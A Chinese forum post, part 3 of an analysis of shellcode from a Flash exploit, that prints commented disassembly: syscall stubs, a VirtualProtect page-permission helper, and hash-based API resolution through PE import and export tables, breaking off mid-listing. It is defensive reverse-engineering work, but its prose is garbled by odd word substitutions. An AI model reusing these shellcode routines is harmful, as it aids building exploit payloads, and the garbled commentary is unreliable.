找回密码
 赶紧注册吧

QQ登录

只需一步,快速开始

查看: 4323|回复: 0
打印 上一主题 下一主题

flash破绽所用shellcode的剖析3 [复制链接]

注意:1、各网友务必提高交友安全意识,不要轻易参加非天府交友网官方举办的见面交友活动,以防酒托,饭托或引发其他危险;请详细阅读《天府交友网服务条款》和《免责申明》!

Rank: 4

升级  19.8%

跳转到指定楼层
楼主
发表于 2011-10-24 01:46:20 |只看该作者 |倒序浏览
接着是旁边一个为了重定位所做的回call:004071A8    E8 1BFFFFFF     call 004070C8                                         ; (19)再一次为了重定位而跳回,这里必需F7
  再接着是被拷贝的NATIVE API原始代码:
004071AD    6A 29           push 29
004071AF    58              pop eax
004071B0    36:8D5424 04    lea edx, dword ptr [esp+4]
004071B5    CD 2E           int 2E
004071B7    C2 2000         retn 20
004071BA    6A 30           push 30
004071BC    58              pop eax
004071BD    BA 0003FE7F     mov edx, 7FFE0300
004071C2    FF12            call dword ptr [edx]
004071C4    C2 2000         retn 20
004071C7    6A 32           push 32
004071C9    58              pop eax
004071CA    BA 0003FE7F     mov edx, 7FFE0300
004071CF    FF12            call dword ptr [edx]
004071D1    C2 2400         retn 24
004071D4    B8 F0000000     mov eax, 0F0
004071D9    36:8D5424 04    lea edx, dword ptr [esp+4]
004071DE    CD 2E           int 2E
004071E0    C2 1400         retn 14
004071E3    B8 15010000     mov eax, 115
004071E8    EB 05           jmp short 004071EF
004071EA    B8 1F010000     mov eax, 11F
004071EF    BA 0003FE7F     mov edx, 7FFE0300
004071F4    FF12            call dword ptr [edx]
004071F6    C2 1400         retn 14
  接下来是用VirtualProtect改API函数进口的页维护属性的子函数
004071F9    52              push edx
004071FA    54              push esp
004071FB    6A 04           push 4
004071FD    6A 20           push 20
004071FF    57              push edi
00407200    FF56 14         call dword ptr [esi+14]                               ; ViturlProtect,修正函数前面0×20字节为可读可写
00407203    5A              pop edx
00407204    C3              retn
  接下来是遍历kernel32.dll的输入表找NATIVE API地址的函数,这些都是通用函数,shellcode用得比拟多,就勤于再解释了。
00407205    51              push ecx
00407206    8B45 3C         mov eax, dword ptr [ebp+3C]
00407209    45              inc ebp
0040720A    8B5C28 7F       mov ebx, dword ptr [eax+ebp+7F]
0040720E    4D              dec ebp
0040720F    03DD            add ebx, ebp
00407211    8B13            mov edx, dword ptr [ebx]
00407213    03D5            add edx, ebp
00407215    33C9            xor ecx, ecx
00407217    49              dec ecx
00407218    41              inc ecx
00407219    8B048A          mov eax, dword ptr [edx+ecx*4]
0040721C    8D4428 02       lea eax, dword ptr [eax+ebp+2]
00407220    60              pushad
00407221    33C9            xor ecx, ecx
00407223    0FBE10          movsx edx, byte ptr [eax]
00407226    3AD6            cmp dl, dh
00407228    74 08           je short 00407232
0040722A    C1C9 07         ror ecx, 7
0040722D    03CA            add ecx, edx
0040722F    40              inc eax
00407230  ^ EB F1           jmp short 00407223
00407232    390F            cmp dword ptr [edi], ecx
00407234    61              popad
00407235  ^ 75 E1           jnz short 00407218
00407237    8B43 10         mov eax, dword ptr [ebx+10]
0040723A    03C5            add eax, ebp
0040723C    8B0488          mov eax, dword ptr [eax+ecx*4]
0040723F    AB              stos dword ptr es:[edi]
00407240    59              pop ecx
00407241    C3              retn
  代码内容最后是遍历PE文件输出表得到API函数地址的子函数,同样是通用的模块,也懒于第N次正文了:
00407242    51              push ecx
00407243    56              push esi
00407244    8B75 3C         mov esi, dword ptr [ebp+3C]
00407247    8B742E 78       mov esi, dword ptr [esi+ebp+78]
0040724B    03F5            add esi, ebp
0040724D    56              push esi
0040724E    8B76 20         mov esi, dword ptr [esi+20]
00407251    03F5            add esi, ebp
00407253    33C9            xor ecx, ecx
00407255    49              dec ecx
00407256    41              inc ecx
00407257    AD              lods dword ptr [esi]
00407258    03C5            add eax, ebp
0040725A    33DB      
分享到: QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏0

使用道具 举报

※为保护您的个人隐私,防止被恶意盗用,在论坛中不得留下手机、QQ、邮箱等联系方式,否则将被屏蔽!,若有需要,请发送站内消息
您需要登录后才可以回帖 登录 | 赶紧注册吧

关于我们|网站地图|帮助中心|商务合作|法律声明|诚聘英才|联系我们| 时尚 娱乐 成都婚庆公司 网站制作天府星空
Copyright © 2010-2011 天府交友(Www.Tflove.Com)版权所有